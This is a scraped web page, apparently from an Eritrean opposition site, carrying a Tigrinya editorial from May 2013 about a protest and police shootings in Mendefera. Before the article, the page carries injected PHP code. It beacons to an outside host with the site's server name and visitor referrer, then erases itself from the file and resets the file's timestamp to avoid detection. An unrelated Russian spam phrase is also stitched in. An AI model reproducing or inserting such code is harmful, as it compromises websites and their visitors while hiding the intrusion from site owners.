check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } መኸተ ኣንጻር ውልቀምልኪ ድርዕና ተወፋይነት ንሙሉእ ሓርነት ክብርና
кремлевская диета

መኸተ ኣንጻር ውልቀምልኪ ድርዕና ተወፋይነት ንሙሉእ ሓርነት ክብርና

User Rating: / 3
PoorBest 

 

 

 

 

 

18 ግንቦት  2013

   

መኸተ ኣንጻር ውልቀምልኪ ድርዕና ተወፋይነት ንሙሉእ ሓርነት ክብርና

ፍሹልን ጥፉሽን ስርዓት ተባሂሉ ካብ ዝምደብ ነዊሕ ዘቑጸረ ምህሙን ምሕደራ ኢሳይያስጋዓትስ ኣለኩ ኢላ ተስተንፍስከም ዝብሃል ንገለ ግሩሃት ደገፍቱን ኣብ ላንጋላንጋ ንዝርከቡ በዓል ሸለው ላጋ ተወላወልቲ ባእታትን ንምድንጋር ብምሕላን በዓል መሬታዊ ናጽነት ኤርትራ ብተብለጭለጭቲ ነገራት ንምብዓል ህርድግ ናበለ ይርከብ። ሓሶትን ሓድሽ ምጥማቅ ሽምን  ዘይምነዎ ገበነኛ ኢሳይያስ ናይ ሎሚ በዓል መሬታዊ ናጽነት 24 ግንቦትመኸተ ድርዕና ስራሕ ክብርናብዝብል ቴማ ንልዕሊ ሳምንቲ ሃተው ናበለ ከብዕሎ ወጢኑ ዘሎ።

ነዚ በዓል ብናይ ሓሶት ብልጭልጭ ንምድማቕ ሓያል ወጻእታት ስለዝሓተተሞ ቁጠባዊ ዓቕሙ ድማ ከምቲ ዝፍለጥ መሊኡ ስለዝጠፈሸ ብተደራራቢ ዓይኒ ዘውጽአ ቅጽዓት ምሃብ ኣገልግሎት ብምቑራጽ ህዝቢ ዳግማይ ኸፊሉ ክስራሓሉ ብምግባር ከምኡ ከኣ ሸፋቱ ናብ ሱዳን ኣዋፊሩ ኤርትራውያን ናጨወዩ ገንዘብ ብምኽፋል ቆልዑት ካብ ኣብያተ ትምህርቲ ከይተረፉ ብምስራቕ ክፍሊት ካብ ወለዲ ብምሕታት ከከሓሕሶ ይፍትን ኣሎ። እዚ ኣብታ ዘላታ ተወሰኸታ ከምዝበሃል ነቲ ካብ ቀጽጽር ወጺኡ ዝጸንሐ ናይ ጸጥታ ምንጋዕ ካብ ዝሓመቐ ናብ ዝኸፍአ ኣሰጋጊርዎ ይርከብ።

መንግስቲ ኣሜሪካ ኣብ ቅነ በዓል ናጽነት ነቲ ኢሳይያስ ዝምድና ምስ ኣሜሪካ ይመሓየሽ ኣሎ ኤምባሲ ኣሜሪካ ኣብ ኣስመራ ዳግም ተኸፊቱ ስሩዕ ስርሑ ጀሚሩ ቪዛ ይህብ ኣሎ ክብል ዘቃልሖ ሓሰት ዘፍሽል መግለጺ ኣውጽኡ ኣሎ።

እቲ መግለጺ ብሕዳር 2012 ኣመሓላሊፍዎ ዝነበረ ንዜጋታቱ ናብ ኤርትራ ከይገሹ ዝኽልክል መምርሒ ኣብ 2013 እዩ ኣሐዲስዎ ዘሎ። ኤምባሲ ኣሜሪካ ካብ ኣስመራ ወጻኢ ንዝርከቡ ዜጋታቱ ዝኾነ ይኹን ኣገልግሎት ክህብ ስለዘይክእል ናብ ኤርትራ ከይገሹ’ዩ ዝመክር።

ፍቓድ እንተደኣ ተዋሂቡካ ናብ’ታ ክትከዳ ዝሓተትካ ቦታ ደኣ’ምበር ንእግረ መገድኻ ናብ ካልኦት ቦታታት ከተላግስ ኣይፍቀደልካን’ዩ። ከም ገዳማት ዝኣመሰሉ ሃይማኖታዊ ቦታታት ንምብጻሕ ከኣ’ሞ እንተደኣ ተረኺቡ ፍሉይ ፍቓድ’ዩ ዘድሊ ይብል እቲ ጸብጻብ። ካልእ መንግስቲ ኣሜሪካ ንዜጋታቱ ናብ ኤርትራ ከይገሹ ዘጠንቐቀሉ ምክንያት ኤርትራውያን ዝመበቆሎም ኣሜሪካውያን ብዘይ ብቑዕ ምኽንያት ዝተኣሰሩ ስለዘለዉ’ዩ። መንግስቲ ኤርትራ ኣሜሪካውያን ክኣስር እንከሎ ንኤምባሲ ኣሜሪካ ኣይሕብሮን እዩ ይብል እቲ መግለጺ።

ኣብ’ዚ ቀረባ እዋን ብረት ዝተሰከሙ ኣባላት ህዝባዊ ሚሊሻ ከተማታት ንምሕላው  ብለይቲ ኣብ ዝገብርዎ ሮንዳታት ወረቐት መንነት ስለዝሓቱ ኣሜሪካውያን ዜጋታት ፓስፖርቶም ካብኦም ክፈልይዎ ከምዘይግብኦም ይመክር። ብፍላይ ከኣ ኣብ ወርሓት ሚያዝያን ግንቦትን ምስ ዝኽሪ በዓል ናጽነት ዝተተሓሓዘ ጽዕቕ ዝበለ ተፍታሻት ከምዝካየድ እቲ መግለጺ ይሕብር።

ናይ ፈንጅታት ሓደጋታትን ኣብ ኤርትራ ብሰንኪ ድኽነት እናዛየደ ዝመጽእ ዘሎ ገበናዊ ተግባራት’ውን ተወሳኺ ምኽንያታት ናይ’ቲ መጥንቀቕታ’ዩ።

ድሕሪ’ዚ ከም መቐጸልታ ድጋፍ ንስርሒት ፎርቶ ተጌሩ ዝውሰድ ሰፊሕ ተቓውሞታት ኣብ ኩሉ ከተማታት ሃገርና ናይ ተቓውሞ ፅሑፋት ይብተኑ ህዝቢ ኣብ ኣኼባ ብግልጺ ይቃወሞ ኣሎ ኣብዚ ቅነ ከኣ ጅግና ህዝቢ መንደፈራ ብሰለማዊ ሰልፊ ንኢሳይያስ ከብዱ ሓቦጭበጭ ዘበለ ተቓውሞ ኣስምዑ ኣሎ። ዝርዝር ኣቢልካ ንምርኣይ ዝኣክል ‘ቲ ፍጻመ ከምዝስዕብ ነይሩ።

ድሕሪ ፍጻመ ፎርቶ ንህዝቢ ዞባ ደቡብ ብትሪ ንምሓዝ ብዝብል መምርሒ ዝተፈላለዩ ኣካላት ህግደፍ ናብቲ ዞባ እንዳመጽኡ ጸቕጢታት ክገብሩ ጸኒሖም’ዮም። ኣብቲ ዞባ ዛጊት ኣብ ውሽጢ 4 ወርሒ ጥራይ 3 ኣማሓደርቲ ተቀያይሮም እዮም። ወተሃደራዊ ግፋታት እንዳበዝሑ ተማሃሮ ልዕሊ ዕድመ ብዝብል ምስምስ ናብ ታዕሊም ተወሲዶም’ዮም። ብዙሓት ኣስማቶም ዘይተፈለጡ ሰባት ካብ ገባር ህዝቢ ከተማ መንደፈራ ከካብ ገዝኦም ብኣባላት ሃገራዊ ድሕነት እንዳተወሰዱ ኣብ ዝኣተውዎ ቦታ ኣይተፈለጠን። ከም መቐጸልታ ናይ’ዚ እዋነዊ ኩነታትን ውህሉል ወጸዓታትን ህዝቢ መንደፈራ ብዕለት 26-4-13 ኣብቲ ፍሉጥ ማእከል ከተማ ጅራፍዮሪ ሓያል ህዝባዊ ተቓውሞ ኣካይዱ’ዩ። ትሕዝቶ እቲ ውዕውዕ ህዝባዊ ተቓውሞ ከምዝቕጽል ተገሊጹ ኣሎ።

ድሕሪ ፋና ተስፋማርያምን ኤፍሬም ገ/ክርስቶስን ንዞባ ደቡብ ክተማሓድር  ዝተመዛዘት ጽጌሬዳ ወ/ገርግስ ብዕለት 26/04/13 ህዝባዊ ኣኼባ ንኽግበር ጻዊዒት ገይራ። በቲ ጻውዒት መሰረት በዝሖም ልዕሊ 2500 ዝኾኑ ነበርቲ ከተማ መንደፈራ መንእሰያት፡ ስራሕተኛታት መንግስትን ኣማሓደርቲ ምምሕዳር ከባቢታትን ኣብቲ ብሃ.ማ.መ.ተ.አ ዞባ ደቡብ ዝውነን ኣደራሽ ኩዶ ሕንባሻ ንግሆ ሰዓት 8.30 ተረኸቡ።

ኣብቲ ዕለት ከም ኣካየድቲ ኣኼባ ተሰይሞም ዝነበሩ ኣባላት

-       ኣማሓዳሪት ዞባ ደቡብ ወ/ሮ ጽጌረዳ ወ/ገርግሽ

-       ሓላፊ ፖሊስ ዞባ ደቡብ መጀር ተኽሊት

-       ኣማሓዳሪ ን/ዞባ መንደፈራ ኣቶ ተስፋይ ገ/መስቀል ‘ዮም ነይሮም።

መራሒት ኣኼባ ኣመሓዳሪት ዞባ ደቡብ ወ/ሮ ጽጌሬዳ ወ/ገርግሽ ሰላምታ ድሕሪ ምልውዋጥ ናብቲ ቀንዲ ኣጀንድኣ ብምስግጋር ዓላማ እቲ ኣኼባ

“ ከተማና ከተማ መንደፈራ ካበይ ናበይ ትኸይድ ኣላ? ንቀጻሊ ከመይን እንታይን ኣካይዳ ክንክተል ኣለና?” ብዝብልን ካልኦት ካድራዊ ትንታነታት ብምሃብ ከፈተቶ። ብምቅጻል ከተማ መንደፈራ ብጽሬታ ተሰክፍ ከተማ እንዳኾነት ከምዝመጸትን ማዕረ ካልኦት ከተማታት ኤርትራ ተሰሪዓ ከም ዘላ ድሕሪ ምግላጽ ብጽሬት፡ ጥዕናን ባህሪያት ህዝብን ዝበለጸት ከተማ ንምግባር “ንዘሎ ጸገማት ብምዝርራብን ኢሂን ሚሂን ተባሃሂልና ብምርድዳእን ክንፈትሖ ኣለና።” ዝብልን ካልእ ምስሉይ መደረ ብምስማዕን ንሕቶን ሪኢቶን ነቶም ተኣከብቲ ዕድል ሃበት።

ካብ ተኣከብቲ ክልተ ሰባት ተንሲኦም ብዛዕባ ጽሬትን ኩፖን ናይ ላምባን 2 ሕቶታት ኣቕሪቦምላ። እቶም ሕቶታት

“ ኣብ ግዜ ጽሬት ኩሉ ኣባል ቤተሰብ ካብ ዝሳተፍ ካብ ነፍሲ ወከፍ ገዛ ንምንታይ ሓደ ሰብ ጥራይ ዘይሳተፍ” ከምኡ’ውን “ ኣብ ናይ ላንባ ኩፖን መዓልቲ ይሕሎ የለን ሓንሳብ ድሕሪ 2 ወርሒ ሓንሳብ ድሕሪ 3 ወርሒ ይመጸና ኣሎ ንምንታይ ብግዚኡ ዘይመጸና ዝብላ ሕቶታት’ዮም ነይረን።

እታ ኣብ ባይታ ንዘሎ ሓቂ ኣሚንካ ግቡእ መልሲ ካብ ምሃብ ዝተለመደ መጻንሒ መደረ ምምራጽ እትፈትው ጽጌሪዳ ወ/ገርግስ ነተን ዝተላዕላ ሕቶታት ከምዝስዕብ መለሰት። “ብዛዕባ ጽሬት ኣብ ሰሙን ንሓደ ሰዓት  ጥራይ ስለዝኾነ ዓቢ ይኹን ንእሽቶ ናይ ግድን ክሳተፍ ዘለዎ’ዩ ከምኡ’ውን ብዛዕባ ላንባ ዝምልከት እቲ ቀንዲ ጸገም ዋሕዲ ነዳዲ ከምኡ’ውን መርከብ ብምድንጓያ ግዜ ከምዝወስድ ሓቢራ… ህዝቢ ዓቕሊ ንከየጻብብ ሓደራ በለት። ብምቕጻል

ንኣዛዚ ፖሊስ ዞባ ደቡብ መጀር ተኽሊት ዕድል ሂባቶ

እቲ ኣዛዚ ድማ ነቲ ንክትሰምዖ ዘደንጽው ተቓውሞ ዘስምዖ መደረ ነቲ ብዕለት 26/4/13 ዝተራኣዩ ህዝባዊ ተቓውሞ መበገሲ ኮነ። ትሕዝቶ መደረ ሜጀር ተኽሊት ዝስዕብ’ዩ ነይሩ። መጀር ተኽሊት ቀጺሉ

“ምስ ተኣከብቲ ሰላምታ ድሕሪ ምልውዋጥ….. ድኻም ስለዘለኩም ናይ ሎማዓንቲ ዛዕባ ሕጽር ኣቢለ ከቅርበልኩም ብምባል ጥራዙ ገንጺሉ ምንባብ ቀጸለ።… ፓሊስን ኣባላት ሓይልታት ምክልኻልናን ምስ ህዝቢ ብምትሕብባር ንሃርናን ህዝብናን ካብ ጸላኢ ነድሕኖ ከምዝነበርና ይዝከር። ብመንጽር’ዚ ጸላእትናን ልኡኾምን ይፈሽል ምንባሩ ስራሕቶም ከየድምዑ ንሕዞም ምንባርና ይፍለጥ። ሕጂ ግን ኩሉ ነገር ገዲፍናዮ። ሉኡኻት ጸላኢ ብሸለልትነትና የጥቅዑናን ምሳና ኣለዉ ኢልና ዝኣመናዮም ሰራሕተኛታት መንግስቲ ብጾትና’ውን ብጸላእትና ተወዲቦም ይጠልሙና ኣለዉ። ብልክዕ ከምዚ እንዳገበሩ ዝረኸብናዮም ሃሱሳት ኣለዉ። እዚ ከኣ ድኽመት ህዝብና እዩ። ህዝቢ ከምቀደሙ ምክትታል ተዝቅጽሎ ዝረኣዮ ሓበሬታ ንፖሊስን ዝምልከቶ ኣካልን ተዝሕብር ነይሩ እዚ ኩሉ ኣይምመጸን። እዚ ጉዳይ ዝምልከቶም ኣካላት ክፍሊ ውሽጣዊ ጸጥታን ካልእን ልኡኾም ብዝግባእ ብዘይምፍጻሞም ኣካል እቲ ዘጋጥሞ ዘሎ ጸገም ኮይኖም ይርከቡ።  ብዘይ ዝኾነ ሓገዝ ህዝቢ ዝዕወት ነገር ከምዘየለ ርዱእ እዩ።

ስለዚ ህዝቢ ኤርትራ ሓያል ህዝቢ’ዩ ነይሩ’ሞ ከም ቀደምና ንሓይል። ዝኾነ ምንቅስቓስ ናይ ጨጉሪ ለወጥ ወይ’ውን ጋሻ ሰብ ክንርእይ ከለና ብቀጥታ ንፖሊስ ወይ ኣብ ከባቢና ንዘለዉ ዕጡቓት ሰራዊት ክንሕብር ኣለና ብምባል መምርሒ ምስ ኣውረደ ቀጺሉ ንተኣከብቲ ናይ ሕቶን ሪኢቶን ዕድል ከፊቱ።

ወ/ሮ ምቑር ዝተብሃለት ተቐማጢት እቲ ከተማ ዝኾነት ወናኒት ባር “ሓዳስ” ዝስዕብ ሪኢቶ ኣቕረበት።

“ክትብሎ ዝጸነሓኻ ጽቡቕ እንድዩ ግን ኣብዚ ግዜ’ዚ ደቅና ካብ ቤት ትምህርቲ እንዳውጻእኹም ንታዓሊም እንዳበልኹም ትወስድዎም ኣለኹም። ናብ ታዕሊም ቦታ ከይድና ደቅና እንተሓተትና’ውን “የለውን” ትብሉና ኣለኹም። ኣብዚ ዝተረፉ ደቅና’ውን ትምህርቲ ኣቋረጾም ኣበይ ይሓድሩ ኣበይ ይውዕሉ? እንታይ የጋጥሞም ኣይንፈልጥን? ስለዚ ከመይ ጌርና ኢና ንዝኣተወ ጋሻ “ፈታዊ ድዩ ጸላኢ ኢልና ክነለሊ ንኽእል? ናይ ኩሉ ጠንቂ ከኣ ባዕልኹም ኢኹም። ንስኹም ከኣ ትፈልጥዎ ኢኹም።” ኢላ ዘረበኣ ወዲኣ ኮፍ ክትብል ምስ በለት…… ሜጀር ተኽሊት “ሓንሳብ ኣብ ዘለኽዮ ደው በሊ” በላ።

ብድሕሪኡ ኣብ ከባቢኡ ንዝነበሩ ፖላይስ ተዛሪቡ…….”ናብ ቅድሚት ንክትመጽእ ኣዘዘ

 ህዝቢ ተኣኪብሉ ካብ ዝነበረ ኣዳራሽ  ኩዶ ሕንባሻ ኣውጺኦም ኣብ ኣፍ ደገ እቲ ኣዳራሽ ናብ ዝነበረት መኪና ፖሊስ እንዳዳፋኡ ወስድዋ። እታ ሰበይቲ “እንታይ ጌረ ኣነ?.... ግቡእ’የ ሓቲተ… ንምንታይ ድዩ ሕቶ ሪኢቶ ኢሉኒ…. ዝተዛረብኩዎ ከኣ ሓቂ’ዩ” ብምባል ዓው ኢላ እንዳተዛረበት በቶም ፖላይስ ተደፊኣ ናብ መኪና ደየበት።

ድሕሪ’ዚ ኣብ ናይ ቋሕ ሰም ግዜ ኣብ ቅድሚት እቲ ኣዳራሽ ኣብ መሬት ኮፍ ኢሎም ዝነበሩ ብዙሓት መንእሰያት ብሓንሳብ ሆ ብምባል ተላዒሎም ነቲ ማዕጾ ኣዳራሽ ብሓይሊ  ፈንጢሖም ወጺኦም። ኩሉ ተኣካቢ’ውን ደድሕሪኦም ስዒቢ ወጺኡ። እቶም መንእሰያት ኣብ ቀጽሪ እቲ ኣዳራሽ ናብ ዝርከብ ቤት ጽሕፈት ሃ.ማ.መ.ተ.ኤ ዞባ ደቡብ ብምኻድ ተዳልዩ ንዝጸንሐ ጭርሖታት ኣልዒሎም ተወዲቦም ጭርሖታቶም ዘርጊሖም ናብ ጎደናታት ወጺኦም ናብ ጅራፍዮሪ በጺሖም። እቲ ዝወጸ ህዝቢ’ውን ብዝተፈላለዩ ኣንፈት ኣብ ጅራፍዮሪ ተኣካኺቡ’ዩ። ጅራፍዮሪ ኣብዛ ስዓት እዚኣ ታሕሪር ስኴር ምስሪ መሲላ ነይራ።

መንእሰያት ኣብ ዓበይቲ ጨርቅታትን ናይ ቻርት ወረቀታትን ዝጻሓፍዎ ጭርሖታት ድማ ማለት

1.      መሰል መንእሰያት ይተሓሎ

2.      ደሞክራሲ ይረጋጋጽ

3.      ምርጫ ፕረዚደንት ይተግበር

4.      ጀ/ል ስብሓት ኤፍሬም ካብ ስልጣን ይውረድ ዝብሉ ነይሮም

ነዚ ጭርሖታት ዝሓዙ መንእሰያት ኣብ ጅራፍዮሪ ምስ ዝተኣከበ ህዝቢ ብሓባር ተወዲቦም ብማይክሮፎናት ድምጾም እንዳጉልሑን እንዳጨርሑን ናብ ካንሸሎ ቤት ጽሕፈት ዞባ ደቡብ ድቅድቅ በሉ።

ኣብኡ ዝጸንሑ ኣባላት ጸጥታ ነቲ መንእሰይን ህዝብን ብናይ በትሪ ማህረምቲ ንኽመልስዎ ወላ’ኳ እንተፈተኑ ብኣንጻሩ መንእሰያት ብኣእማን   ነቶም ኣባላት ጸጥታ ምህራም ጀመሩ። በዚ ዝተሰናበዱ ኣባላት ጸጥታ ንሰማይ ጥይት ምትኳስ ጀመሩ። ህዝብን መንእሰያትን ብዝያዳ ሓሪኖም ተቃውሞኦም ቀጸሉ። ንስለስተ ኣባላት ጸጥታ ብደንጎላ ሃሪሞም ምስ ኣውደቑዎም  በዚ ዝተሰናበዱ ኣባላት ጸጥታ ናብ ሰማይ ኣቅኒዑ ዝነበረ ተኹሶም ናብ መንእሰያት ብምቕናዕ ን7 መንእሰያት ብጥይት ሃረሙ። ብሓፈሻ ካብ ክልቲኡ ወገን 10 ሰባት ግዳይ እቲ ጎንጺ  ኮይኖም ናብ መወከሲ ሆስፒታል ከተማ መንደፈራ ብኣምቡላንስ ተወሲዶም። ብምኽንያት እዚ ግጭት እዚ ዘጋጠመ ናይ ሞት ሓደጋ ከምዘይነበረ ድሕሪ’ዚ  ኩነታት እቲ ተቓውሞ ንግዚኡ ሃዲኡ’ዩ።

ንጽባሒቱ ተረሳሊኑ ክቕጽል’ዩ ኢሎም ዝሰግኡ መራሕቲ ህግደፍ ዕለት 26 ዓርቢ ናብ 27 ዘውግሕ ለይቲ ኣባላት ጸጥታ ብምውፋር

1.      ሓላፊ ሃ.ማ.መ.ተ.ኤ ዞባ ደቡብ ነበር ሃገር ጋንዛይ

2.      ርእሰ መምህር ቤት ትምህርቲ ሳንጀርጆ ኣማኑኤል ኣለም

3.      መምህር ኢንግሊሽ ማሕመድ ብርሃን

4.      መምህር ፊዚክስ ሳህለ መንገሻን ካልኦትን ከካብ  ገዝኦም ዓፊኖም ወሲዶሞም ሓዲሮም። ቀዳም ዕለት 27 ለይትን ቀትርን ሓያል ግፋ  ክካየድ ዊዒሉ።

ሰንበት ዕለት 28 ወጋሕታ ካብን ናብን ምንቅስቃስ መጓዓዝያ ጠጠው ኣቢሎም ኩሉ ህዝቢ ድማ ናብ ኣዳራሽ ኩዶ ሕምባሻ ንክእከብ መምርሒ ኣመሓላሊፎም። ነቲ ህዝቢ ዝኣከቡ ላዕለዎት ሓለፍቲ ድማ

 

1.      ብ/ጀ  ተኽለ ማንጁስ

2.      ስምኦን ዮውሃንስ ካብ ቤት ጽሕፈት ፕረዚደንት ማእከላይ ቤትጽሕፈት ህግደፍ ካብ ኣስመራ ክመጹ ብምግባር ምስ ኣማሓዳሪት ዞባ ደቡብ ወ/ሮ ጽጌሬዳ ወ/ገርግሽን ኣዛዚ ፖሊስ ሜጀር ተኽሊት ብምዃን ብሓባር ኣኼበኦም ቀጺሎም

ናይ መኽፈቲ መደረ ዘስመዐትን ካብ መንግስቲ ተላኢኾም ዝመጹ ሓለፍቲ ንህዝቢ ዘላልየት ወ/ሮ ጽጌሬዳ ወ/ገርግሽ ነይራ ኣስዒቡ ሰፊሕ መደረ ዘቅረበ ኣብዚ እዋን’ዚ ሉኡኽ ኢሳይያስ ኮይኑ ጠብሎቕሎቕ ዝብል ዘሎ ብ/ጀ ተኽለ ክፍለ (ተኽለ ማንጁስ)ዩ።

መደረ ብ/ጀ ተኽለ ማንጁስ ዝስዕብ ትሕዝቶ ነይርዎ።  ንተኣከብቲ ሰላምታ ድሕሪ ምቅራብ፣  “ምቅርራብ 24 ጉንቦት  ከመይ ከመይ ኣሎ? ብምባል ቀጺሉ ብቀጥታ ካብተን  ብዕለት 26 ብመንእሰያት ካብ ዝተላዓለ ጭርሖታት ሓንቲ ምርጫ ፕረዚደንት ይተግበር ትብል ጭርሖ ቆንጪሉ ብምውሳድ ምስ ላዕለዎት  ኣካላት ተዘራሪብና ድሕሪ ማዓልቲ ናጽነት ክንገብሮ ተረዳዲእና ኣለና። ዕለትን መዓልትን ክንገረኩም’ዩ “ብዝተረፈ ግን ኣበዓዕላ በዓል ነጻነት ንዝምልከት ንዝኾነ ይኹን ብጸላእትና ንዘጋጥሙ ስግኣታት ንምምካን ኩላትና ክንነጥፍ ኣለና

በለ እዚ ዘረደአና ነገር ተልዩ ገበነኛ ኢሳይያስ ኣብ በዓል ናጽነትና ህዝቢ ተለዓዒሉ ንሓቀኛ ሓርነት ሆ ክብል’ዩ ኢሉ ብምስጋእ እቲ በዓል ኮንዶኾን ብዝኾነ ምቅብጣርን ምድህላልን ብሰላም ከሕልፍ ልዕሊ ዓቕሙ ኮይንዎ ከምዘሎ’ዩ።

- ነዚ ኢና ከኣ መኸተ ኣንጻር ውልቀምልኪ ድርዕና ተወፋይነት ንሙሉእ ሓርነት ክብርና ንብል ዘለና።

ኩሉ ዓቕምና ኣንጻር ኣፍራሲ ሃገር ኢሳይያስ ይቕናዕ

ወጊድ ንፍርሒ ሓጀትና ንፍትሒ

ኤዲቴሪያል ቦርድ ወጋሕታ ሳሊና

18 ግንቦት 2013

 

 Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشرSecurity code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player